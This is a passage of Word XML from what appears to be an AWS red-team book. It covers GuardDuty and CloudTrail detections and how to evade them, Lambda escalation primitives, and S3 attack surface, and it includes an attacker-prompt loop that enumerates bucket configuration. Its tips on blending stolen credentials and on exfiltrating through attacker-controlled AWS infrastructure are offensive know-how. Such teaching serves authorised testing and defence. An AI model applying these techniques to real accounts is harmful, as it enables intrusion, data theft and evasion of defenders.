        <w:t xml:space="preserve"> to change the pinned version to the new malicious layer. Second, if the layer is pulled from a third-party source (PyPI, npm, a private repo), normal supply-chain attacks against that source apply, and the Lambda has no runtime integrity check that will notice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42089390" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>10.7  Compute detections and what evades them</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E11C15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compute-plane detections that matter on an AWS red team are: GuardDuty's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> (covered above), its </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>CredentialAccess:IAMUser/AnomalousBehavior</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> (role-based behavioural modeling), CloudTrail data events for Lambda (which capture </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Invoke</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> calls as data events when enabled — and they usually aren't), and CloudWatch alarms on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>UpdateFunctionCode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>UpdateFunctionConfiguration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> that some mature teams add.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A342CF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Evasion in this zone is mostly about blending. Stolen credentials used at the same volume and from the same regions as the legitimate identity almost never trigger the GuardDuty anomaly model. Lambda code updates that happen at a realistic cadence — not three in a minute, but one alongside the normal deploy pipeline — often do not trigger alarms because the alarms are built to suppress during the deploy window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAE805B" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Key takeaways</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377F27D5" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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IMDSv2 is a meaningful control against SSRF-only primitives but does not defend against proxy vulnerabilities that forward full HTTP, local code execution, or mis-configured hop limits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2427EB20" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Instance credentials exfiltrated to outside-AWS addresses trigger GuardDuty; exfiltrate via attacker-controlled AWS infrastructure to reduce alert severity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A73EED0" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:spacing w:before="36" w:after="36"/>
        <w:ind w:left="1008"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ssm:StartSession</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ssm:SendCommand</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> are RCE primitives that require no network path and are visible to defenders only as CloudTrail metadata; session content is not logged unless explicitly configured.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9D6047" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Lambda execution-role credentials are in environment variables, not behind an IMDS flow; any code execution in a Lambda yields them immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C835EE7" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:spacing w:before="36" w:after="36"/>
        <w:ind w:left="1008"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>lambda:UpdateFunctionCode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>lambda:AddPermission</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>, and layer-version abuse are the three primary Lambda-escalation primitives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DCBF53" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Chapter 11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t>Storage: S3, EBS, and EFS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA4B34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Storage is where data lives and where exfiltration and impact frequently occur. For offensive purposes, the three storage services — S3 object, EBS block, and EFS file — share no mechanics, but they share a theme: each has a wide IAM surface, each has an out-of-band sharing primitive (bucket policies, snapshot sharing, EFS policies/mount targets), and each has a defender-visible access log that is rarely reviewed. This chapter covers the canonical attacks on each, with particular attention to EBS snapshot e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>xfiltration, which remains the most operationally durable large-data-at-rest exfiltration primitive in AWS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627ED315" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>11.1  S3 object-access primitives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3674A54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S3 permissions that matter are not the obvious ones. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>s3:GetObject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>s3:ListBucket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> are unremarkable. The interesting permissions are the write and policy-modifying primitives: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>s3:PutObject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> to drop payloads or overwrite objects, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>s3:PutBucketPolicy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> to grant cross-account access, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>s3:PutBucketAcl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>s3:PutObjectAcl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> to weaken ACLs, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>s3:PutBucketNotification</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> to hook Lambda to object uploads (covered in Chapter 14), and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>s3:PutBucketWebsite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> to enable the bucket as a static site and redirect hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F51D5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first step on any bucket surface is to dump the policy, the ACL, the website config, the CORS, the lifecycle, and the replication configuration. This tells you who is supposed to have access, who actually has access, and what machinery is attached to the bucket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D733AD7" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1182083839"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>attacker@kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>~$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> BUCKET=prod-data-lake-reports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A538B4" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1182083839"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>attacker@kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>~$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> cmd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> get-bucket-policy get-bucket-acl get-bucket-cors \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657D08C3" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1182083839"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    get-bucket-website get-bucket-lifecycle-configuration \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C60399" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1182083839"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>get-bucket-replication get-bucket-versioning \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F84C77F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1182083839"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    get-bucket-logging get-public-access-block; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E60E7C" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1182083839"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>echo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"=== $cmd ==="</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC65920" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1182083839"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> s3api $cmd --bucket $BUCKET 2&gt;&amp;1 | head -20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035615AB" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1182083839"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1889EA1C" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1182083839"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>=== get-bucket-policy ===</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE6F55B" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1182083839"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205FA550" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1182083839"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"Policy"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"{\"Version\":\"2012-10-17\",\"Statement\":[..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1055AE47" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1182083839"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420BA6D2" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1182083839"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>=== get-bucket-replication ===</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540B95A3" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1182083839"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7875C4" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1182083839"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"ReplicationConfiguration"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374ABB18" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1182083839"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"Role"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"arn:aws:iam::111122223333:role/s3-replication"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F847DB" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1182083839"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"Rules"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: [{ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"Destination"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E988FA" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1182083839"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"Bucket"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"arn:aws:s3:::replica-bucket-444455556666"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5538D8A7" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1182083839"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
